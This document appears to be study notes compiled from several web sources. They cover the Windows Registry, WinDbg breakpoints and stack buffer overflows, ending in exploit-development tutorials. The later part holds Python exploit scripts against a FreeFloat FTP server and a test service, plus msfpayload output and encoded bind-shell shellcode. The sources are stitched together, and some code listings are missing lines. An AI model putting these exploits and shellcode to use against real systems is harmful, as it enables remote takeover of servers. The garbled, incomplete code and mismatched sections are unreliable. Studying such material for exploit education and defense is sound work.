A central hierarchical database used in Windows 98, Windows CE, Windows NT, and Windows
2000 used to store information that is necessary to configure the system for one or more
users, applications, and hardware devices.
The Registry contains information that Windows continually references during operation, such
as profiles for each user, the applications installed on the computer and the types of
documents that each can create, property sheet settings for folders and application icons,
what hardware exists on the system, and the ports that are being used.
The Registry replaces most of the text-based .ini files that are used in Windows 3.x and MS-
DOS configuration files, such as the Autoexec.bat and Config.sys. Although the Registry is
common to several Windows operating systems, there are some differences among them. A
registry hive is a group of keys, subkeys, and values in the registry that has a set of supporting
files that contain backups of its data. The supporting files for all hives except
HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config folder on Windows NT 4.0,
Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. The supporting files
for HKEY_CURRENT_USER are in the %SystemRoot%\Profiles\Username folder. The file name
extensions of the files in these folders indicate the type of data that they contain. Also, the lack
of an extension may sometimes indicate the type of data that they contain.
In Windows 98, the registry files are named User.dat and System.dat. In Windows Millennium
Edition, the registry files are named Classes.dat, User.dat, and System.dat.
Note
The following table lists the predefined keys that are used by the system. The maximum size of
a key name is 255 characters.
HKEY_CURRENT_USER Contains the root of the configuration information for the user who is currently logged on
user's folders, screen colors, and Control Panel settings are stored here. This information
associated with the user's profile. This key is sometimes abbreviated as HKCU.
HKEY_USERS Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a
subkey of HKEY_USERS. HKEY_USERS is sometimes abbreviated as HKU.
HKEY_LOCAL_MACHINE Contains configuration information particular to the computer (for any user). This key is
sometimes abbreviated as HKLM.
HKEY_CURRENT_CONFIG Contains information about the hardware profile that is used by the local computer at sys
startup.
Note
The registry in 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista is
divided into 32-bit and 64-bit keys. Many of the 32-bit keys have the same names as their 64-
bit counterparts, and vice versa. The default 64-bit version of Registry Editor that is included
with 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista displays the 32-
bit keys under the node HKEY_LOCAL_MACHINE\Software\WOW6432Node. For more
information about how to view the registry on 64-Bit versions of Windows, see How to view
the system registry by using 64-bit versions of Windows.
The following table lists the data types that are currently defined and that are used by
Windows. The maximum size of a value name is as follows:
• Windows Server 2003, Windows XP, and Windows Vista: 16,383 characters
Long values (more than 2,048 bytes) must be stored as files with the file names stored in the
registry. This helps the registry perform efficiently. The maximum size of a value is as follows:
Note
There is a 64K limit for the total size of all values of a key.
Name Data type Description
Binary Value REG_BINARY Raw binary data. Most hardware component information is st
as binary data and is displayed in Registry Editor in hexadecim
format.
Expandable REG_EXPAND_SZ A variable-length data string. This data type includes variables
String Value are resolved when a program or service uses the data.
Multi-String REG_MULTI_SZ A multiple string. Values that contain lists or multiple values in
Value form that people can read are generally this type. Entries are
separated by spaces, commas, or other marks.
Binary Value REG_RESOURCE_LIST A series of nested arrays that is designed to store a resource li
that is used by a hardware device driver or one of the physical
devices it controls. This data is detected and written in the
\ResourceMap tree by the system and is displayed in Registry
Editor in hexadecimal format as a Binary Value.
Binary Value REG_RESOURCE_REQUIREMENTS_LIST A series of nested arrays that is designed to store a device driv
list of possible hardware resources the driver or one of the ph
devices it controls can use. The system writes a subset of this
the \ResourceMap tree. This data is detected by the system an
displayed in Registry Editor in hexadecimal format as a Binary
Value.
Binary Value REG_FULL_RESOURCE_DESCRIPTOR A series of nested arrays that is designed to store a resource li
that is used by a physical hardware device. This data is detecte
and written in the \HardwareDescription tree by the system a
displayed in Registry Editor in hexadecimal format as a Binary
Value.
None REG_NONE Data without any particular type. This data is written to the re
by the system or applications and is displayed in Registry Edito
hexadecimal format as a Binary Value
Before you edit the registry, export the keys in the registry that you plan to edit, or back up the
whole registry. If a problem occurs, you can then follow the steps in the Restore the
registry section to restore the registry to its previous state. To back up the whole registry, use
the Backup utility to back up the system state. The system state includes the registry, the
COM+ Class Registration Database, and your boot files. For more information about how to
use the Backup utility to back up the system state, see the following articles:
• How to use the backup feature to back up and restore data in Windows Server 2003
To modify registry data, a program must use the registry functions that are defined in Registry
Functions.
Administrators can modify the registry by using Registry Editor (Regedit.exe or Regedt32.exe),
Group Policy, System Policy, Registry (.reg) files, or by running scripts such as VisualBasic script
files.
We recommend that you use the Windows user interface to change your system settings
instead of manually editing the registry. However, editing the registry may sometimes be the
best method to resolve a product issue. If the issue is documented in the Microsoft Knowledge
Base, an article with step-by-step instructions to edit the registry for that issue will be
available. We recommend that you follow those instructions exactly.
Warning
Serious problems might occur if you modify the registry incorrectly by using Registry Editor or
by using another method. These problems might require that you reinstall the operating
system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at
your own risk.
• Change a value
The navigation area of Registry Editor displays folders. Each folder represents a predefined key
on the local computer. When you access the registry of a remote computer, only two
predefined keys appear: HKEY_USERS and HKEY_LOCAL_MACHINE.
Create a Registration Entries (.reg) file that contains the registry changes, and then run the .reg
file on the computer where you want to make the changes. You can run the .reg file manually
or by using a logon script. For more information, see How to add, modify, or delete registry
subkeys and values by using a Registration Entries (.reg) file.
The Windows Script Host lets you run VBScript and JScript scripts directly in the operating
system. You can create VBScript and JScript files that use Windows Script Host methods to
delete, to read, and to write registry keys and values. For more information about these
methods, visit the following Microsoft Web sites:
• RegDelete method
• RegRead method
• RegWrite method
For more information about the WMI Command-Line utility, see A description of the Windows
Management Instrumentation (WMI) command-line utility (Wmic.exe).
You can use the Console Registry Tool for Windows (Reg.exe) to edit the registry. For help with
the Reg.exe tool, type reg /? at the Command Prompt, and then click OK.
To restore the whole registry, restore the system state from a backup. For more information
about how to restore the system state from a backup, see How to use Backup to protect data
and restore files and folders on your computer in Windows XP and Windows Vista.
Note
Backing up the system state also creates updated copies of the registry files in
the %SystemRoot%\Repair folder.
https://docs.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-
registry-advanced-users
You can specify the location of a breakpoint by virtual address, module and routine offsets, or
source file and line number (when in source mode). If you put a breakpoint on a routine
without an offset, the breakpoint is activated when that routine is entered.
• A breakpoint can be set on non-executable memory and watch for that location to be
read or written to.
If you are debugging more than one process in user mode, the collection of breakpoints
depends on the current process. To view or change a process' breakpoints, you must select the
process as the current process. For more information about the current process,
see Controlling Processes and Threads.
• Use the .bpcmds (Display Breakpoint Commands) command to list all breakpoints
along with the commands that were used to create them.
• Use the bm (Set Symbol Breakpoint) command to set new breakpoints on symbols
that match a specified pattern. A breakpoint set with bm will be associated with an
address (like a bp breakpoint) if the /d switch is included; it will be unresolved (like
a bu breakpoint) if this switch is not included.
• Use the ba (Break on Access) command to set a processor breakpoint, also known as
a data breakpoint. These breakpoints can be triggered when the memory location is
written to, when it is read, when it is executed as code, or when kernel I/O occurs. For
complete details, see Processor Breakpoints (ba Breakpoints).
• Use the bsc (Update Conditional Breakpoint) command to change the condition under
which an existing conditional breakpoint occurs.
In Visual Studio and WinDbg, there are several user interface elements that facilitate
controlling and displaying breakpoints. See Setting Breakpoints in Visual Studio and Setting
Breakpoints in WinDbg.
Each breakpoint has a decimal number called the breakpoint ID associated with it. This number
identifies the breakpoint in various commands.
Breakpoint Commands
You can include a command in a breakpoint that is automatically executed when the
breakpoint is hit. For example, the following command breaks at MyFunction+0x47, writes a
dump file, and then resumes execution.
dbgcmdCopy
0:000> bu MyFunction+0x47 ".dump c:\mydump.dmp; g"
Note If you are controlling the user-mode debugger from the kernel debugger, do not use g
(Go) in the breakpoint command string. The serial interface might be unable to keep up with
this command, and you will be unable to break back into CDB. For more information about this
situation, see Controlling the User-Mode Debugger from the Kernel Debugger.
Number of Breakpoints
In kernel mode, you can use a maximum of 32 software breakpoints. In user mode, you can
use any number of software breakpoints.
The number of processor breakpoints that are supported depends on the target processor
architecture.
Conditional Breakpoints
You can set a breakpoint that is triggered only under certain conditions. For more information
about these kinds of breakpoints, see Setting a Conditional Breakpoint.
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/methods-of-
controlling-breakpoints
#include <string.h>
charbuffer[64];
if (argc < 2)
return 1;
strcpy(buffer,argv[1]);
return 0;
Stack-based buffer overflow exploits are likely the shiniest and most common form of exploit
for remotely taking over the code execution of a process. These exploits were extremely
common 20 years ago, but since then, a huge amount of effort has gone into mitigating stack-
based overflow attacks by operating system developers, application developers, and hardware
manufacturers, with changes even being made to the standard libraries developers use. Below,
we will explore how stack-based overflows work and detail the mitigation strategies that are
put in place to try to prevent them.
Deep dive on stack-based buffer overflow attacks
On the bright side, while security was not a driving factor in early computer and software
design, engineers realized that changing running instructions in memory was a bad idea, so
even as long ago as the ‘90s, standard hardware and operating systems were doing a good job
of preventing changes to instructional memory. Unfortunately, you don’t really need to change
instructions to change the behavior of a running program, and with a little knowledge,
writeable data memory provides several opportunities and methods for affecting instruction
execution.
#include <signal.h>
#include <stdio.h>
#include <string.h>
int main(){
char realPassword[20];
char givenPassword[20];
gets(givenPassword);
printf("SUCCESS!\n");
}else{
printf("FAILURE!\n");
raise(SIGINT);
return 0;
}
If you don’t know the C programming language, that’s fine. The interesting thing about this
program is that it creates two buffers in memory called realPassword and givenPassword as
local variables. Each buffer has space for 20 characters. When we run the program, space for
these local variables is created in-memory and specifically stored on the stack with all other
local variables (and some other stuff). The stack is a very structured, sequential memory space,
so the relative distance between any two local variables in-memory is guaranteed to be
relatively small. After this program creates the variables, it populates the realPassword value
with a string, then prompts the user for a password and copies the provided password into
the givenPassword value. Once it has both passwords, it compares them. If they match, it
prints “SUCCESS!” If not, it prints “FAILURE!”
msfuser@ubuntu:~$ ./example.elf
test
FAILURE!
givenPassword: test
realPassword: ddddddddddddddd
This is exactly as we’d expect. The password we entered does not match the expected
password. There is a catch here: The programmer (me) made several really bad mistakes,
which we will talk about later. Before we cover that, though, let’s open a debugger and peek
into memory to see what the stack looks like in memory while the program is executing:
(gdb) run
aaaaaaaaaaaaaaaa
FAILURE!
(gdb)
At this point, the program has taken in the data and compared it, but I added an interrupt in
the code to stop it before exiting so we could “look” at the stack. Debuggers let us see what
the program is doing and what the memory looks like on a running basis. In this case, we are
using the GNU Debugger (GDB). The GDB command ‘info frame’ allows us to find the location
in memory of the local variables, which will be on the stack:
source language c.
Saved registers:
rip at 0x7fffffffddd8
(gdb)
Now that we know where the local variables are, we can print that area of memory:
As mentioned, the stack is sequentially stored data. If you know ASCII, then you know the
letter ‘a’ is represented in memory by the value 0x61 and the letter ‘d’ is 0x64. You can see
above that they are right next to each other in memory. The realPassword buffer is right after
the givenPassword buffer.
Now, let’s talk about the mistakes that the programmer (me) made. First, developers should
never, ever, ever use the gets function because it does not check to make sure that the size of
the data it reads in matches the size of the memory location it uses to save the data. It just
blindly reads the text and dumps it into memory. There are many functions that do the exact
same thing—these are known as unbounded functions because developers cannot predict
when they will stop reading from or writing to memory. Microsoft even has a web page
documenting what it calls “banned” functions, which includes these unbounded functions.
Every developer should know these functions and avoid them, and every project should
automatically audit source code for them. These functions all date from a period where
security was not as imperative as it is today. These functions must continue to be supported
because pulling support would break many legacy programs, but they should not be used in
any new programs and should be removed during maintenance of old programs.
We have looked at the stack, noticed that the buffers are located consecutively in memory,
and talked about why gets is a bad function. Let’s now abuse gets and see whether we can
hack the planet program. Since we know gets has a problem with reading more than it should,
the first thing to try is to give it more data than the buffer can hold. The buffers are 20
characters, so let’s start with 30 characters:
(gdb) run
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
FAILURE!
givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: ddddddddddddddd
source language c.
Saved registers:
rip at 0x7fffffffddd8
(gdb) x/200x 0x7fffffffddd0
We can see clearly that there are 30 instances of ‘a’ in memory, despite us only specifying
space for 20 characters. We have overflowed the buffer, but not enough to do anything. Let’s
keep trying and try 40 instances of ‘a.’
(gdb) run
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
FAILURE!
givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: aaaaaaaa
The first thing to notice is that we went far enough to pass through the allotted space
for givenPassword and managed to alter the value of realPassword, which is a huge success.
We did not alter it enough to fool the program, though. Since we are comparing 20 characters
and we wrote eight characters to the realPassword buffer, we need to write 12 more
characters. So, let’s try again, but with 52 instances of ‘a’ this time:
(gdb) run
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
SUCCESS!
givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: aaaaaaaaaaaaaaaaaaaa
source language c.
Saved registers:
rip at 0x7fffffffddd8
Success! We overflowed the buffer for givenPassword and the data went straight
into realPassword, so that we were able to alter the realPassword buffer to whatever we
wanted before the check took place. This is an example of a buffer (or stack) overflow attack.
In this case, we used it to alter variables within a program, but it can also be used to alter
metadata used to track program execution.
https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-
you-need-to-know/
https://owasp.org/www-community/vulnerabilities/Buffer_Overflow
Memory Layout
Credits: GeeksforGeeks
The Stack
The stack is a piece of the process memory, a data structure that works LIFO (Last in first out).
A stack gets allocated by the OS, for each thread (when the thread is created). When the
thread ends, the stack is cleared as well. The size of the stack is defined when it gets created
and doesn’t change.
Source: Wikipedia
A stack frame is a frame of data that gets pushed onto the stack. In the case of a call stack, a
stack frame would represent a function call and its argument data. The function return address
is pushed onto the stack first, then the arguments and space for local variables.
Registers
• EAX: Accumulator used for performing calculations, and used to store return values
from function calls. Basic operations such as add, subtract, compare use this general-
purpose register
• EBX: Base (does not have anything to do with base pointer). It has no general-purpose
and can be used to store data.
• EDX: Data this is an extension of the EAX register. It allows for more complex
calculations (multiply, divide) by allowing extra data to be stored to facilitate those
calculations.
• EDI: Destination Index points to the location where the result of data operation is
stored
Credits: Acunetix
We can feed any memory address within the stack into the EIP (return address). The program
will execute instructions at that memory address. We can put our shellcode into the stack and
put the address to the start of the shellcode at the EIP, and the program will execute the
shellcode.
1. Write past array buffer ending and overwriting EIP register to crash the program.
2. Find the offset of the payload after which the EIP is overwritten.
4. Find the address of the JMP ESP opcode so that program flow can be redirected to the
stack.
5. Overwrite return address at EIP with the address of JMP ESP.
Exploiting
We create a long string using the command python -c "print 'A'*300" and then send it as input
to the server.
Crashed application
We restart the application with Immunity Debugger attached and send the same payload once
more. We can see that the application crashed and the EIP register is overwritten with 41 (A in
hexadecimal).
Finding Offset
Now that we know that we can overwrite the EIP register we need to find out the exact
number of bytes in the payload after which the EIP gets overwritten. To find this we use a tool
called msf-pattern_create to create a unique non-repeating string and send it as a payload.
After the application crashes, we note the value of EIP and use msf-pattern_offset to calculate
the exact value.
host = "192.168.0.107"
port = 31337char = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")# EIP Writing Pattern
pattern = "A"*146 + "BBBB" + char + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)# print out what we received
print "Received: {0}".format(data)
client.close() # Close the Connection
After sending this we check the value of the stack (right-click on the ESP register and select
Follow in Dump option).
We can verify that EIP is under our control
As all the characters that we have sent are present, we can confirm that there is no bad
character other than \x00 and \x0A. If there was a bad character it would have been replaced
with B0 or the list would have been truncated.
Example of a program with lots of bad characters. Not a part of this exploit.
Now that we have control over the EIP register we need it to somehow point it to the ESP
register so that it will start executing the contents of the stack. The JMP ESP command does
the same thing. When JMP ESP command is executed it jumps to ESP. We can find out the
location of JMP ESP using the following ways:
Game Over
We generate shellcode using msfvenom and use the generated shellcode in our final exploit.
1. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-
based-overflows/
2. https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbuf
feroverflowgood_tutorial.md
3. https://www.fuzzysecurity.com/tutorials/expDev/1.html
4. https://www.youtube.com/watch?v=qSnPayW6F7U
5. https://www.geeksforgeeks.org/memory-layout-of-c-program/
6. https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
7. https://www.acunetix.com/blog/web-security-zone/what-is-buffer-overflow/
https://sghosh2402.medium.com/understanding-exploiting-stack-based-buffer-overflows-
acf9b8659cba
This is the first part in a (modest) multi-part exploit development series. This part will just
cover some basic things like what we need to do our work, basic ideas behind exploits and a
couple of things to keep in mind if we want to get to and execute our shellcode. These tutorials
will not cover finding bugs, instead each part will include a vulnerable program which needs a
specific technique to be successfully exploited. In the fullness of time I intend to cover
everything from “Saved Return Pointer Overflows” to “ROP (Return Oriented Programming)”
of course these tutorials won't write themselves so it will take some time to get there. It is
worth mentioning that these tutorials wont cover all the small details and eventualities; this is
done by design to (1) save me some time and (2) allow the diligent reader to learn by
participating.
I would like to give special thanks to Offensive Security and Corelan, thanks for giving me
this amazing and painful addiction!!
Mona.py - Download
Mona is an amazing tool with tons of features which will help us to do rapid and reliable
exploit development. I won’t be discussing all the options here, we’ll get to them during the
following parts of the tutorial. Download it and put it in Immunity’s PyCommands folder.
Pvefindaddr.py - Download
Pvefindaddr is Mona’s predecessor. I know it’s a bit outdated but it’s still useful since there are
some features that haven’t been ported to Mona yet. Download it and put it in Immunity’s
PyCommands folder.
Virtualization Software
Basically there are two options here VirtualBox which is free and Vmware which isn't. If its
possible I would suggest using Vmware; a clever person might not need to pay for it ;)).
Coupled with this we will need several (32-bit) operating systems to develop our exploits on
(you will get the most use out of WindowsXP PRO SP3 and any Windows7).
(2) Overflows
For the purpose of these tutorials I think it’s important to keep things as simple or difficult as
they need to be. In general when we write an exploit we need to find an overflow in a
program. Commonly these bugs will be either Buffer Overflows (a memory location receives
more data than it was meant to) or Stack Overflows (usually a Buffer Overflow that writes
beyond the end of the stack). When such an overflow occurs there are two things we are
looking for; (1) our buffer needs to overwrite EIP (Current Instruction Pointer) and (2) one of
the CPU registers needs to contain our buffer. You can see a list of x86 CPU registers below
with their separate functions. All we need to remember is that any of these registers can store
our buffer (and shellcode).
EAX - Main register used in arithmetic calculations. Also known as accumulator, as it holds
results
EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of
the
program.
ECX - The Counter register is often used to hold a value representing the number of times a
process
EDX - A general purpose registers. Also used for I/O operations. Helps extend EAX to 64-bits.
ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used
as
an offset address in string and array operations. It holds the address from where to read
data.
EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by
the
ES register. Used as an offset address in string and array operations. It holds the implied
EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of
the
ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is
used
EIP - Instruction Pointer (holds the address of the next instruction to be executed)
https://www.fuzzysecurity.com/tutorials/expDev/1.html
For our first exploit we will be starting with the most straight forward scenario where we have
a clean EIP overwrite and one of our CPU registers points directly to a large portion of our
buffer. For this part we will be creating an exploit from scratch for ”FreeFloat FTP”. You can
find a list of several exploits that were created for ”FreeFloat FTP” here.
Normally we would need to do badcharacter analysis but for our first tutorial we will rely on
the badcharacters that are listed in the pre-existing metasploit modules on exploit-db. The
characters that are listed are ”\x00\x0A\x0D”. We need to keep these characters in mind for
later.
First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that
we can build on it to create our exploit. You can see my POC below, I have based it on the
exploits for ”FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing
”anonymous” user account which comes configured with the FTP server (the exploit should
work with any valid login credentials).
#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close
Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer
the program crashes. In the screenshot below you can see that EIP is overwritten and that two
registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP
seems more promising since it contains a larger chunk of our buffer (I should mention however
that creating an exploit starting in EDI is certainly possible).
Registers
Overwriting EIP
Next we need to analyze our crash, to do that we need to replace our A's with the metasploit
pattern and resend our buffer. Pay attention that you keep the original buffer length since a
varying buffer length may change the program crash.
root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2
Au3Au4Au5Au6Au7Au8Au9Av0Av1
Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4A
x5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A
y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb
2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc
2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be
7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7
Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
When the program crashes again we see the same thing as in the screenshot above except
that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let
“mona” do some of the heavy lifting. If we issue the following command in Immunity debugger
we can have “mona” analyze the program crash. You can see the result of that analysis in the
screenshot below.
!mona findmsp
Metasploit Pattern
From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after
the initial 247-bytes of our buffer. Like I said before we can also see that ESP contains a larger
chunk of our buffer so it is a more suitable candidate for our exploit. Using this information we
can reorganize the evil buffer in our POC above to look like this:
When we resend our modified buffer we can see that it works exactly as we expected, EIP is
overwritten by our four B's.
EIP = 42424242
That means that we can replace those B's with a pointer that redirects execution flow to ESP.
The only thing we need to keep in mind is that our pointer can't contain any badcharacters. To
find this pointer we can use “mona” with the following command. You can see the results in
the screenshot below.
Pointers to ESP
It seems that any of these pointers will do, they belong to OS dll's so they will be specific to
“WinXP PRO SP3” but that’s not our primary concern. We can just use the first pointer in the
list. Keep in mind that we will need to reverse the byte order due to the Little Endian
architecture of the CPU. Observe the syntax below.
I should stress that it is important to document your exploit properly for your own and others
edification. Our final stage POC should look like this.
#!/usr/bin/python
import socket
import sys
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
#------------------------------------------------------------
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close
Ok lets restart the program in the debugger and put a breakpoint on our pointer so the
debugger pauses if it reaches it. As we can see in the screenshot below EIP is overwritten by
our pointer and we hit our breakpoint which should bring us to our buffer located at ESP.
Breakpoint
#!/usr/bin/python
import socket
import sys
shellcode = (
#------------------------------------------------------------
# Badchars: \x00\x0A\x0D
#------------------------------------------------------------
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
All that remains now is to pop in some shellcode. We will be using msfpayload to generate our
shellcode and pipe the raw output to msfencode to filter out badcharacters.
root@bt:~# msfpayload -l
[...snip...]
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a
command shell
[...snip...]
Module: payload/windows/shell_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Description:
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
